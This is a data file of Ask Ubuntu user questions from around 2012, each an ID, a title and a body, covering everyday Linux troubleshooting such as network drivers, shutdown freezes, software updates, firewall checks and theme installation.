105607	how do i get an atheros ar8131 ethernet card working ?	i have an atheros ar8131 ethernet card on a lenovo b560 laptop . sometime in the past , probably at some upgrade or other my wired connection stopped functioning . i know the card is ok because it works with windows . i tried upgrading to ubuntu 11.10 hoping the problem would go away . it did n't ... tried to google the problem , but all of the solutions i found did n't work for me . this is probably a driver problem . any help will be appreciated . please note that i 'm a linux newbie so i do n't really know what logs to post ... niv
105608	ubuntu 11.10- shutdown problem	i am using ubuntu 11.10 with latest updates . from last two week , when i try to shutdown ubuntu , some times my pc freeze with ubuntu normal shutdown screen and shutdown by pressing power button on cpu . after restart the ubuntu i check the syslog , the last entries in problem session seen as below : - feb 19 19:45:41 ubu dbus [ 582 ] : [ system ] activating service name='org.freedesktop.accounts ' ( using servicehelper ) feb 19 19:45:41 ubu dbus [ 582 ] : [ system ] successfully activated service 'org.freedesktop.accounts' feb 19 19:45:41 ubu accounts-daemon [ 986 ] : started daemon version 0.6.14 feb 19 19:45:41 ubu anacron [ 995 ] : anacron 2.3 started on 2012-02-19 feb 19 19:45:41 ubu anacron [ 995 ] : normal exit ( 0 jobs run ) feb 19 19:45:41 ubu kernel : [ 20.873895 ] ppdev : user-space parallel port driver feb 19 19:45:41 ubu dbus [ 582 ] : [ system ] activating service name='org.freedesktop.colormanager ' ( using servicehelper ) feb 19 19:45:41 ubu dbus [ 582 ] : [ system ] successfully activated service 'org.freedesktop.colormanager' feb 19 19:45:42 ubu dbus [ 582 ] : [ system ] activating service name='org.freedesktop.consolekit ' ( using servicehelper ) feb 19 19:45:42 ubu dbus [ 582 ] : [ system ] successfully activated service 'org.freedesktop.consolekit' feb 19 19:45:43 ubu dbus [ 582 ] : [ system ] activating service name='org.freedesktop.upower ' ( using servicehelper ) feb 19 19:45:43 ubu dbus [ 582 ] : [ system ] successfully activated service 'org.freedesktop.upower' feb 19 19:45:43 ubu dbus [ 582 ] : [ system ] activating service name='org.freedesktop.realtimekit1 ' ( using servicehelper ) feb 19 19:45:43 ubu dbus [ 582 ] : [ system ] successfully activated service 'org.freedesktop.realtimekit1' feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : successfully called chroot . feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : successfully dropped privileges . feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : successfully limited resources . feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : running . feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : watchdog thread running . feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : canary thread running . feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : successfully made thread 1218 of process 1218 ( n/a ) owned by '1000 ' high priority at nice level -11 . feb 19 14:15:43 ubu rtkit-daemon [ 1220 ] : supervising 1 threads of 1 processes of 1 users . feb 19 14:15:44 ubu rtkit-daemon [ 1220 ] : successfully made thread 1224 of process 1218 ( n/a ) owned by '1000 ' rt at priority 5 . feb 19 14:15:44 ubu rtkit-daemon [ 1220 ] : supervising 2 threads of 1 processes of 1 users . feb 19 14:15:44 ubu rtkit-daemon [ 1220 ] : successfully made thread 1225 of process 1218 ( n/a ) owned by '1000 ' rt at priority 5 . feb 19 14:15:44 ubu rtkit-daemon [ 1220 ] : supervising 3 threads of 1 processes of 1 users . feb 19 19:45:44 ubu pulseaudio [ 1218 ] : [ pulseaudio ] bluetooth-util.c : error from registerendpoint reply : org.freedesktop.dbus.error.unknownmethod feb 19 19:45:44 pulseaudio [ 1218 ] : last message repeated 2 times feb 19 19:45:44 ubu udev-configure-printer : add /module/lp feb 19 19:45:44 ubu udev-configure-printer : failed to get parent feb 19 19:45:44 ubu dbus [ 582 ] : [ system ] activating service name='org.freedesktop.udisks ' ( using servicehelper ) feb 19 19:45:44 ubu dbus [ 582 ] : [ system ] successfully activated service 'org.freedesktop.udisks' feb 19 19:45:45 ubu kernel : [ 24.846105 ] ext4-fs ( sda3 ) : re-mounted . opts : errors=remount-ro , commit=0 feb 19 19:45:46 ubu kernel : [ 25.565376 ] init : plymouth-stop pre-start process ( 1338 ) terminated with status 1 feb 19 19:45:54 ubu kernel : [ 34.004532 ] init : tty4 main process ( 822 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.004838 ] init : tty5 main process ( 827 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.005119 ] init : tty2 main process ( 844 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.005421 ] init : tty3 main process ( 845 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.005726 ] init : tty6 main process ( 847 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.006287 ] init : irqbalance main process ( 873 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.006561 ] init : cron main process ( 893 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.007338 ] init : tty1 main process ( 1339 ) killed by term signal feb 19 19:45:54 ubu kernel : [ 34.010115 ] init : plymouth-upstart-bridge main process ( 1416 ) terminated with status 1 feb 19 19:45:54 ubu kernel : kernel logging ( proc ) stopped . feb 19 19:45:54 ubu rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.1 '' x-pid= '' 574 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . i give '' sudo shutdown now '' command in terminal but the screen freeze with the message *disabling powe rmanagement ... ... then i give '' sudo poweroff '' command this time system shutdown correctly how can solve my problem ?
105609	where can i find the .png or .jpeg of the music , videos , documents , etc . folder icons ?	i made a link to the music folder ( for example ) , and the folder is not the same music folder icon in the home folder , but it 's a folder with a black arrow on it . where can i find the picture files for the icon ? it 's kind of hard to explain . i am trying to change the icon from the one with the black arrow to the default one in the home folder . i want the bottom music icon to the music icon on top .
105610	can not uninstall software from software center	i am using ubuntu 11.10 . when i open the software center and click installed on the toolbar all i get is a list down the left hand side with games , graphics , internet etc . it does not show any software that has been previously installed . how can i uninstall software from the software center ?
105613	why does it takes so long to shutdown when using the live usb ?	when i try to shut down after i am booted using a live usb , it always takes a long time . so i am always forced to shutdown using the power button . why does it take that long of a time ? edited : i have never waited long enough to know how long it takes to shut down i usually press the power button to shut it down after 3-5 minutes because when i shut down using window it shuts down within a minute . it is verson 11.10. i am using a microsdadapter usb , with a 2gb microsd inside
105614	change gnome-sound-applet icon	i run a window manager ( awesome ) for my desktop interface . i run gnome-sound-applet and i get the little applet , and it has a full black icon . however , my top panel is also black , so i ca n't see the icon . how can i change the icon ? thanks . i only want to change this icon in particular .
105615	how do i create a fedora 16 live usb from ubuntu ?	unetbootin and liveusb install do n't support fedora 16 yet , so how do i manually create a live usb ?
105623	can not install devede after installing vlc ppa	i 've updated to vlc 2.0 through ppa and ubuntu told me that it had to make a partial dist upgrade . so i did it but then i 've seen that devede was removed , i think because it was in conflict with some files of vlc . now i 've removed vlc and all its dependencies via synaptic but when i try to reinstall devede , ubuntu says that it can not install it because it can not resolve some conflicts . now what can i do ?
105627	how to remove unwanted configuration files/folders ?	when installing an application it creates few files/folder , mostly in home ~/.config and ~/.local/share/ . after removing the application these files do not automatically get removed . so , is there a way to remove all the files related to a removed app ? ps : how to remove configuration files completely < - i 've read this question but it suggests removing the files one-by-one for each application . i am looking for a way to remove all these files in one step , if there 's any .
105628	`` the connection to the daemaon was lost '' when updating ubuntu	i recently did my first ubuntu update . one of the items posted this : the connection to the daemaon was lost . most likely the daemon crashed . when i clicked the details icon , this message came up : it seems that the daemon died . other than that it appears that all the updates were processed . what does all this mean and is there any reason to be concerned or fear that a virus is on my pc ? when my av scans does it include a scan of ubuntu ?
105637	what is the way to get the latest version of libreoffice ?	use the ppa or manually install the debs from http : //www.libreoffice.org ? is there any difference between the two ? how long does it take for the ppa to upgrade to the latest version ?
105638	best text editor for linux	what is the best text editor for ubuntu , mostly used for web development . or a good all-round software like a ide .
105644	select on track of a midi file for playing with timidity	$ timidity file.mid recognizes the 4 tracks of my midi file : track name : soprano track name : alto track name : tenor track name : bass timidity plays them all at the same time . is it also possible to play only one or two tracks at the same time ? i checked the man page , but i could not find such an option .
105650	how do i create system settings entries ?	i 'd like to start learning how to develop system settings dialogs using python and gtk . what is required ? i know python and gtk well . the question is how to make the dialogs themselves . are they built into system settings , or can we attach new dialogs at runtime ?
105651	is it possible to install 11.10 on an hp pavilion g7 notebook ?	i recently purchased an hp pavilion g7-1310us notebook with the intention of doing a full install of the latest version of ubuntu on it . i succeeded in installing ubuntu 11.10 64-bit , but not without difficulties . i could n't find any guides for this new generation of hp laptops , so i 'm posting this to aid others .
105652	where is the file used by file ( 1 ) and libmagic to determine mime types ?	according to man 5 magic : '' the file /usr/share/misc/magic specifies what patterns are to be tested for , what message or mime type to print if a particular pattern is found , and additional information to extract from the file . '' so i went looking for that file : $ file /usr/share/misc/magic /usr/share/misc/magic : symbolic link to `../file/magic' $ ll /usr/share/file/magic total 8 drwxr-xr-x 2 root root 4096 2011-08-08 13:52 ./ drwxr-xr-x 3 root root 4096 2011-10-12 07:27 ../ so it would appear that the file specified in the man page is in fact a symbolic link to a directory which is empty . where is that file on my ubuntu 11.10 system ? the reason i want to look at it is that both the file -- mime command and the python magic module are returning the same incorrect mime types for some files , and i 'd like to see the format of that file so i can modify the relevant associations responsibly . thanks . update : thanks to @ caesium for pointing me to the strace command . piping the output from that to grep magic , i got the following output : open ( `` /usr/lib/libmagic.so.1 '' , o_rdonly ) = 3 access ( `` /home/phoenix/.magic '' , r_ok ) = -1 enoent ( no such file or directory ) open ( `` /etc/magic.mgc '' , o_rdonly ) = -1 enoent ( no such file or directory ) stat ( `` /etc/magic '' , { st_mode=s_ifreg|0644 , st_size=111 , ... } ) = 0 open ( `` /etc/magic '' , o_rdonly ) = 3 open ( `` /usr/share/misc/magic.mgc '' , o_rdonly ) = 3 so it would seem that file first looks in /home/username/.magic , then /etc/magic.mgc , then /etc/magic , and finally in /usr/share/misc/magic.mgc to determine file types . this suggests that the proper place to add user-specific association rules is in /home/username/.magic , and system-wide rules in /etc/magic . i chose the latter option . for the record , here are my additions to /etc/magic : # python : file ( 1 ) magic for python modules and scripts 0 string `` '' '' a python script text executable ! : mime text/x-python 0 regex # ! \ . *\ python a python script text executable ! : mime text/x-python # pyc file : first four bytes are magic number # which changes with each python version . # this is for version 2.7.2 : 0 belong 0x03f30d0a python compiled ! : mime application/x-python-bytecode the man page for magic discourages the use of `` regex '' ( for performance reasons ) , but i thought that this would be the simplest option for me . i hope this helps others solve this problem , should they run into it -- the files which are now detected as text/x-python were previously identified as text/x-java by libmagic , which seemed frankly ridiculous .
105668	`` tick '' does not show on `` software source ''	i 'm having update issues with 11.04 . read one possible solution about selecting `` software sources '' in the repository . the thing is i can not select it , ( tick it ) just shows a line `` - '' . why is this ? any idea ?
105671	how to update vlc to the latest version on ubuntu	related to : how to update vlc to the latest version ? except that there are no builds for natty in this vlc ppa : ppa : videolan/stable-daily index of /videolan/stable-daily/ubuntu/dists : oneiric precise so how do i update vlc ( currently 2.0 ) on ubuntu 11.04 , natty narwhal ?
105673	choosing between binary or source nvidia drivers	i 've been using ubuntu for a while now and had a bit of a problem a while back with my graphics card and got to messing around with drivers . even though i'va had experience ( nasty ones ) with drivers , i 'm still not sure . what are the differences between the binary and source drivers . now that question is not as stupid as it reads . i 'm aware that binary are..well.. binary and source are compiled scripts you run yourself . my question is moreso , what grounds would you choose one over the other ? why is a binary driver more stable and source considered faster ? just on that note . when i say source drivers , i do n't mean nouveau . i mean the drivers you download manually from nvidia and run the scripts yourself .
105676	localhost subdomain wildcard	i 'm trying to have *.localhost pointing at 127.0.0.1 . i read this post which is quite recent and looks promising but dnsmasq ca n't bind port 53 : * starting dns forwarder and dhcp server dnsmasq dnsmasq : failed to create listening socket for port 53 : adresse déjà utilisée does anyone know what 's wrong or any other way of achieving ? thank you .
105678	horrible audio playback after initial updates	i reinstalled ubuntu 11.10 from scratch . tested videos in banshee , vlc , everything was fine . ubuntu then picked up about 356 updates . after doing so , videos are now choppy - youtube , playing mp4 files from my hard drive , does n't matter - quality is horrible . using a radeon 5450 video card elitegroup a885gm-a2 mobo . obviously something in the upgrade hosed things up . everything was working fine when doing a fresh install . thanks , sam
105679	ubuntu on imac - airport disappeared ?	i installed ubuntu on my imac ( which had been getting rather sluggish ) - as the main os , not as a second one via boot camp . ubuntu starts up beautifully , but it ca n't seem to find the airport card . any suggestions ?
105681	is it a security risk if the /tmp folder is not owned by root ?	is it a possible hole of security having /tmp/ folder under user owner instead of root ? i have set it temporally under my user by mistake , after that its impossible to bring it back to root user : ubuntu after that doesent recognize my session .
105689	how is /etc/motd updated ?	i was wondering how /etc/motd is automatically updated ( i 'm on ubuntu 10.04 , server edition ) . i found the update-motd manpage via a web search , but that program is not installed on my machine . the /etc/motd file is regularly updated , however . i just do n't know how and how often . when doing a locate motd , following files are listed : /etc/motd /etc/update-motd.d /etc/update-motd.d/00-header /etc/update-motd.d/10-help-text /etc/update-motd.d/20-cpu-checker /etc/update-motd.d/50-landscape-sysinfo /etc/update-motd.d/90-updates-available /etc/update-motd.d/91-release-upgrade /etc/update-motd.d/98-reboot-required /etc/update-motd.d/99-footer /home/me/.cache/motd.legal-displayed /lib/security/pam_motd.so /usr/bin/motd+shell /usr/lib/update-manager/release-upgrade-motd /usr/lib/update-notifier/update-motd-cpu-checker /usr/lib/update-notifier/update-motd-reboot-required /usr/lib/update-notifier/update-motd-updates-available /usr/share/base-files/motd.md5sums /usr/share/man/man1/motd+shell.1.gz /usr/share/man/man5/motd.5.gz /usr/share/man/man5/motd.tail.5.gz /usr/share/man/man5/update-motd.5.gz /usr/share/man/man8/pam_motd.8.gz /usr/share/ubuntu-serverguide/html/c/pam_motd.html
105692	how to install gtk2-notif2 theme ?	here is the link : http : //gnome-look.org/content/show.php ? content=18886 & foo=6 i 'm using ubuntu 11.10 64-bit .
105698	activate driver and complete installation	background : i have a dell mini 9 that came with ubuntu 8-something preinstalled . i created an ubuntu 11-something installation usb . booting from the usb , i was able to download/install the proprietary driver to connect wirelessly to the internet . however , ubuntu 11 would not fit on my 3.8 hard disk . i created an installation usb with ubuntu 10.04 lts , ran it off the usb , then apparently successfully installed it on my hard disk . however , i can not load a driver for wireless internet access . here is what happens when i boot from the hard drive : gdu-notification-daemon one or more hard disks report health problems . click the icon to get more info . clicking on the icon yields : 3.8 gb hard disk - ata stec ata disk vs020.1.0 disk is being used outside design parameters when i go to system , administration , hardware drivers , it says : downloading package indexes failed , please check your network status . most drivers will not be available . then , when i close that box , the `` hardware drivers '' window is blank except for : no proprietary drivers are in use on this system . my goals/problems : i 'm not sure what to say about my hard disk problem , but that aside , it seems i am dead in the water in any event if i ca n't get a driver to enable wireless internet . potential questions : is there a way to fix my hard disk ? another way to install ubuntu ( 10.x ? 11.x ? ) to make the hard disk problem go away ? ? if i fix the hard disk problem , will i be able to access the drivers ? or is there a way for me to go online with my other computer ( running windows xp ) and download the necessary driver ( which one ? ) to then load onto my mini 9 via usb ? thank you very much for the help of this great community !
105702	where did the jamendo/magnatune plugins go in rhythmbox ?	i used to love listening to jamendo/magnatune via rhythmbox and it seemed they used to be included in the rhythmbox-plugins package , however the plugins do not appear in the plugins list and i ca n't find anything online saying they were removed or what not . when i type in `` rhythmbox jamendo '' in the software center it pops up the plugins package , yet still nothing .
105703	how to change notification area icons only	i mean , what i ideally would like to do is to change all icons system-wide to faenza , but keep ambiance for the systray icons ? i tried replacing icons in the respective folders , but that did n't seem to help .
105705	how do i access a specific file on a windows share ?	in ubuntu , i would like to know how do i access a specific file on a windows share ? in windows xp i could the use run command > > \\someserver but im not sure what the equivilent options are in ubuntu .
105714	i ca n't get ubuntu to connect to wireless	i am running 11.10 on a dell inspiron 9400 . i ran lshw & it recognizes the bcm4311 802.11b/g wlan , but i do n't see any wireless connections . this is a dual boot machine & the wireless works fine in windows .
105719	firewall configuration and consequences	i 'm using ubuntu 11.10 . and i want to know something about firewall in ubuntu , because i want to know if it could be the reason why my application does n't work properly . little background : i'have programmed client-server application , where server is in c and client in java , when i run it from eclipse indigo ( programing editor & environment ) it works fine , but when i compile and run the klient in terminal , the communication does n't work . the server doe n't even recognize that the klient try to connect to the server . ( using tcp sockets ) . somebody said me that firewall could cause these problems , so my question should be probably what effect have firewall to applications and network communication ? ? ? ( i run all on localhost 127.0.0.1 and port 10000 ) . it could be little complex question , so i 'll try to more spiecify it with few little questions connected to my research and effort to find the source of problem . this is what i 've get when i put in terminal iptables -l : chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination 1 ) i look at ubuntu wiki and i suppose there should be some rules , so i suppose that the firewall is not configured and it 's off . question : am i right ? 2 ) if is the firewall off or not configured could it have affect to network communication on my computer ? ( according the backgroud info ) 3 ) if is the firewall on or bad configured can i do something to set up it correctly or swich off ? 4 ) if i do something from no . 3 will it have bad impact to my security ( virus protection on internet ) ? note : i have few theoretical info about linux , newtorking , firewalls , but i do n't have many experiences with linux configuration and practical using these things .
105721	resize root partition from home partition space ( swap in the middle )	i want to resize my root partition using gparted but before doing it i want to make sure i 'm doing it correctly . here is a screenshot of my gparted : so , my question is : assuming i launch ubuntu from a livecd and i get to run gparted how should i give space from the home folder to the root folder knowing that the swap is in the middle ? what is the correct process to minimize the risk of screwing up ?
105723	how to install the 'quicktime'-plugin ( needed for youtube-songs in tomahawk ) ?	when i want to play a song via youtube in tomahawk it does not play the song . a pop-up appears and asks me to find the missing plugin which is 'quicktime ' . but there is no chance to install this plugin . as far as i know i installed every codec . os : ubuntu 11.10 64bit / tomahawk 0.3.3 when i remember correctly it worked with 11.04 , but i am not really sure . but it once worked . now i can not play youtube-songs at all .
105724	in terms of the desktop wall what is `` edge flipping '' ?	i 'm trying to make the launcher reveal on the bottom using compiz , but everytime i change the reveal from left to bottom it says ... the new value for the edge binding for the action reveal mode in plugin ubuntu unity plugin conflicts with the action flip down of the desktop wall plugin . if found the edge flipping settings in compiz , but i do n't want to change them if i do n't know what it means .
105728	anomalous result using bash `` set '' command	when one issues the set command without arguments at a bash prompt ( which should output a list of shell variables and their values ) , a script of 8,274 lines scrolls by . examining this script shows that it is instructions to the shell for executing commands - and it seems that it runs python scripts , making it essentially a kludge of monstrous proportions . i 've seen other builtins behave in a few ways no output : me : ~ $ wait me : ~ $ true me : ~ $ test an error , with no usage hint : me : ~ $ select bash : syntax error near unexpected token `newline' an error , with usage hint : me : ~ $ source bash : source : filename argument required source : usage : source filename [ arguments ] me : ~ $ return bash : return : can only `return ' from a function or sourced script i 'm having trouble understanding why set behaves in this way . it seems undocumented , and i was n't really expecting it . i 'm troubled as to why this happens . can anyone explain ?
105730	google talk account not working with empathy	i am setting up ubuntu . i just got ubuntu installed this morning . i went to set up empathy with my google talk account , but no matter what , it says `` authorization failed '' even though i can very well use my account including google talk in my web browser . please help me - i hope this can be fixed .
105731	postfix installation	i 'm trying to install postfix as per ubuntu 's instructions , but during the installation process , i 'm getting a purple configuration page with various options listed ( no config/internet site etc ) , but there is nowhere to select or type what installation i require . the terminal does n't repsond to anything other than shutting it down . am i missing something simple here ? thanks .
105734	gnome shell blank edge until restart ?	since i installed gnome shell ( which i much prefer over unity ) , there has been a small annoyance appearing on the right side of my screen . as you can see in the picture below , there is a blank few pixels on the right side of the screen . it goes away if i reload gnome-shell ( `` r '' command ) , but obviously , i 'd prefer that this is not necessary . i 'm not sure what exactly is causing this , but was hoping someone might be able to help . i 'm running ubuntu 11.10 on a lenovo thinkpad edge e420s
105743	changing the default im app away from pidgin	is there a way to change the default instant messaging application , in xubuntu , so that the status icons , in the task bar , apply to a different app , like twinkle ? if not , can i remove the status icons , in the task bar , altogether ?
105745	how to run firefox without a display ?	i have written a script in php that requires a browser such as firefox to run since it contains javascript bits . i do not need any output from the process , i just need it to trigger the page , run the page along with the javascript , and then close . now , i am doing this on a vps , so i do not have a display . is there a work around for running firefox without a display ?
105751	how do i find my computer in unity ?	there seems to be no option for my computer , could anyone tell me how to find it ? any help would be appreciated !
105753	how do i install ruby 1.9.2 on ubuntu without crashing ?	i 've been trying to set up ruby on rails for ubuntu 11.10 following these instructions , but i ca n't get it to work . i 'll follow the install guide all the way up to `` rvm install ruby-1.9.2 '' , and at that point terminal will configure ruby-1.9.2 , compile it , and as it starts installing it my computer will shut down . not freeze up or become unresponsive , but totally shut down . what might be causing this error , and how might i fix it ? thanks !
105756	screen goes dark while watching video	my screen goes dark when i 'm watching something online . to be more specific , the screensaver is on and the screen goes dark when i 'm watching `` the daily show '' on their website . this does not happen when videos are being played in smplayer . of-course , when that happens i have to move the mouse and enter the password again .
105759	what does 'webmin ' come up in the netstat/lsof listening ports ?	i have my own server application in c , i bind my server on localhost address 127.0.0.1 and let it listen in first case on port 10000 and in second case on port 20000 . when i run command i lsof | grep ip in last column is : in the first case : localhost : webmin ( listen ) and , in the second case : localhost:20000 ( listen ) so instead of port 10000 there is webmin . what does it mean ? i found this . it says that webmin is a web-based interface for system administration for unix but that is n't enough clear explanation . so what webmin exactly mean ?
105761	how to get a bundler enabled rails app running as a service with upstart ?	i can get some random shell script to run as a service ... that 's not the problem . i think it 's related to environment variables given some of the google-ing i did . either a list of required rails environment variables or a sample rails app running as a service would be helpful . i found this : http : //serverfault.com/questions/327965/how-to-start-a-rake-task-using-upstart which is helpful , but it incorporates rvm . i like rvm , but i 'm looking for a way to do it without this additional bit of complexity . i may be forced to do it that way though ...
105765	ubuntu 11.10 sound stopped working ( speakers and headphones )	ubuntu 11.10 my speakers have stopped working - no sound is coming out . the headphone port is also not working . when i plug in headphones now , no `` jack plugged in '' alert is popping up anymore . i can adjust and mute the sound via buttons and sound settings , but it does n't affect the playback . a few weeks ago , this happened a few times , and i was able to fix the sound by muting/unmuting the sound a few times and increasing/decreasing the volume , but now it will not work . steps i have taken : installed the latest alsa drivers according to https : //wiki.ubuntu.com/audio/upgradingalsa/dkms '' sudo modprobe snd_hda_intel '' purged and reinstalled alsa-base and pulseaudio
105771	how to add options to the appmenu in gnome shell	it is possible to add `` minimize '' and `` resize window '' in the menu next to the activities button ? is there an app/extension for that ? or is it possible by editing a document ? now only show the close option and would be really useful to add this options .
105778	how can i increase the bandwidth sharing between processes ?	how can i increase the bandwidth sharing between processes ? i mean , sometimes i am updating ubuntu and the software updater gets all the bandwidth while other programs like browser/ping wo n't even have enough to barely do a dns lookup ... using ubuntu 10.10 lts
105786	does a linksys wmp110 wireless card work ?	does the linksys wmp110 `` just work '' for ubuntu 11.10 64 bit ?
105791	why is my module dir so big ?	so when i make a custom built kernel , the modules folder is way bigger than the shipped one any idea why ? joel @ joel-ux31e : ~ $ du -- max-depth=1 -h /lib/modules/ 140m /lib/modules/3.2.6-030206-generic 2.0g /lib/modules/3.2.6-test joel @ joel-ux31e : ~ $ diff linux/linux-3.2.6/.config /boot/config-3.2.6-030206-generic 3c3 < # linux/x86_64 3.2.6 kernel configuration -- - > # linux/x86_64 3.2.6-030206-generic kernel configuration 65c65 < config_localversion= '' -test '' -- - > config_localversion= '' ''
105793	why has my file-system turned read-only after updates ?	i 'm running 11.10 and i applied some updates . after that whenever i use my computer , i can , but only for about 2 or 3 minutes before it becomes read-only . any sudo command entered gives me the following error . sudo : ca n't open /var/lib/sudo/ryanmcclure/0 : read-only file system i also use xpad ( a sticky note program ) and if i edit the notes , there is never a problem until about 4 minutes later when it says that it ca n't write to a file because the file system is read on . how do i solve this problem ?
105795	i ca n't put my java jdk7 file into my usr/lib because it says permission denied when i click show more	it gives me a error message saying that i need to have permission . my account is unlocked so i assumed that would fix it but that did nothing . perhaps there is a way to do this via the terminal where i could enter my password for things like this . i need the jdk to run minecraft so , yah , for someone like me this is pretty important .
105797	nvidia install fails on depmod - bad exit status : 1	i 'm trying to install nvidia drivers in a thin client ( ltsp ) image using chroot on a ubuntu 10.04 system . i have been following the tutorial https : //help.ubuntu.com/community/ubuntultsp/atomion the commands i used ; $ sudo su # export ltsp_handle_daemons=false # chroot /opt/ltsp/i386 # mount -t proc proc /proc # apt-get update # apt-get install linux-source-2.6.32 linux-headers-2.6.32-24-generic # apt-get install nvidia-glx-185 # exit the error message i keep getting is : loading new nvidia-current-195.36.24 dkms files ... first installation : checking all kernels ... it is likely that 2.6.32-24-generic belongs to a chroot 's host building for architecture i686 building initial module for 2.6.32-24-generic done . nvidia-current.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/2.6.32-24-generic/updates/dkms/ depmod ... . ( bad exit status : 1 ) dkms : install completed . i 've tried to reinstall and reconfigure but it does n't want to run 'depmod ' again . how can i fix this problem and make it so nvidia drivers load for my current thin client kernel ( linux mythserver-desktop 2.6.32-24-generic ) ?
105799	vlc pixelates a 1080p video on my laptop	i 'm having trouble playing a video i encoded in a .mkv 1080p format through vlc on my laptop . everything runs fine except for every couple minutes while the file is playing , the video becomes really pixelated . if i continue letting it play , it corrects itself after about ten seconds . but if i playback the area where it distorts , it usually plays fine . but sometimes i have to play it in the same area several time before it removes any distortions . so i know it 's not a problem with the file . so could it be a video ram problem ? i 'm not sure how much video ram my laptop has , but seeing as how the video is 1080p , i would n't be surprised if it is being filled up . can anyone help me identify the problem and help me fix it ?
105800	cd/dvd directory cataloguing application for ubuntu	does anyone know a good application for cataloguing directories on ubuntu that supports ext4 , etc . and ntfs and fat32 ?
105801	how to set up automatic translation importing for a particular branch in launchpad ?	i 've run into a problem setting up translations for a project in launchpad . my project consists of a code branch and a translations branch . i have a daily build recipe that nests one branch in the other and builds the binary packages . the problem is that i ca n't figure out how to set up automatic translations for a particular branch - only a particular series . how do i do this ?
105806	can not ping/ssh computers in lan ( including gateway ) but can still access the internet	hello people from askubuntu : as the title says , even though i can access the internet , for some reason , i ca n't ssh/ping computers in my lan . in addition , only computers from outside the lan can ssh to my computer . this problem started when i installed ubuntu 11.10 ( this problem was not present when i was using ubuntu 10.04 ) . i have tried restarting and even disabling ufw . changing the subnet mask and/or gateway ip address results in loss of internet connectivity . i 've tried using the second ethernet port to no avail . i have looked for solutions online but many of those solutions are for the reverse problem ( not being able to access the internet ) . i honestly do n't know what to do . i have even tried turning the computer off and unplugging the power for a few seconds . maybe i 'm using incorrect search keywords . i hope you guys can help me or teach me how to fix this . thank you for your time ! edit 1 : i 've changed the first 3 numbers of the ip addresses below . 110.22.112.11 is the gateway and 110.22.112.91 is my ip . `` ip route show '' outputs this : default via 110.22.112.11 dev eth1 proto static default via 110.22.112.11 dev eth0 metric 100 110.22.112.0/24 dev eth0 proto kernel scope link src 110.22.112.91 110.22.112.0/24 dev eth1 proto kernel scope link src 110.22.112.91 metric 1 169.254.0.0/16 dev eth0 scope link metric 1000
105808	error when installing gtk+-3..2.3	this is the error i get when running the ./configure command in the source folder for gtk+-3.2.3 . any help on how to resolve this ?
105810	changing fan speed for eee pc 900	i was wondering if there was a program that would let me change the speed of my eee pc 900 fan . i have tried lmsensors and eee-control and could not get them to install . does anyone know how to either get them working or know another program that will work ?
105811	ubuntu does n't install after rebooting	i install ubuntu 11.10 in windows 7 by wubi . after reboot it stuck at this image . i am using pentium 4 cpu 2.40ghz with ram-1gb and nvidia geforce fx 5500
105814	some word documents are not opening with libreoffice	i have several of documents in microsoft word 2003 or later format . few of them are opening using libreoffice and few of them do n't . they just open and immediately get closed . i tried changing their extensions to .wpd and .odt , but no luck . my system is dual booting windows 7 and ubuntu 11.10 . i sftped a folder from remote drive to ubuntu , which contained lots of word documents . then unzipped in the local folder . it 's less likely if any mis-formatting would have happened during ftping . i am open to other libre equivalent app which can open word .
105815	how to install burg theme in ubuntu 12.04 ( alpha 2 ) ?	search on the web i can not find any way to install burg theme for ubuntu 12.04 ( alpha 2 ) however there 's a successful solution for ubuntu 11.10 . anyone who knows , share it please . at last , i find a solution for this question : follows the commands in terminal : sudo add-apt-repository ppa : n-muench/burg sudo apt-get update sudo apt-get install burg burg-common burg-emu burg-pc burg-themes burg-themes-common sudo burg-install /dev/sda & & sudo update-burg ( if you installed windows and ubuntu in the same hd , usually windows for 1st partition and ubuntu for 2nd partition ) sudo burg-emu and you can use f3 to choose resolution of grub menu , f2 to choose theme , press key 'f ' to hide the old kernels . restart the computer and you will see the grub menu themed .
105840	install program from source to chroot env	i have an program source ( remmina ) and want to install it to chroot environment . remmina uses cmake system . i can install it to chroot using : sudo make install destdir=mychroot but this is not nice method because i need to make sure the chrooted system meets all requirements ( dependencies ) . i think the best idea is to create deb package and then install it under chroot . but how ? oh i forgot to tell that i am using bazaar ( with git plugin ) and saw there is buildpackage plugin to build debs . maybe this way would be better ? any idea ?
105842	thunderbird notifications not appearing	for some reason , thunderbird 's new mail notifications are no longer appearing at the top right of my screen . i hear the pop sound of new messages , and unity 's thunderbird icon receives a red number indicating the number of new messages . but no ubuntu notifications at all . this seems to have happened after my latest series of updates . other notifications are working , however .
105846	changing default file icon	i changed the default application association for a mimetype that was wrong just editing the file .local/share/applications/mimeapps.list . just doing this was not sufficient to change also the default icon , so how can i set that the default icon for this type of file should be a .png in my home ? ( i can move it anywhere ) right clicking on one of them and change the icon just change the one of that specific file , not for all the others with the same mimetype .
105848	rsync between two computers on lan	i want to rsync between two computers on my lan with ip-adresses 192.168.20.9 and 192.168.20.10 both running ubuntu 10.10 . i want to try rsync and ssh service between the two computers .
105850	how to encrypt /var/www ?	i want encrypt my /var/www folder so i and apache had access . how can i done this ? i tried use ecryptfs , but my sites does not work . please write example , or link for manual .
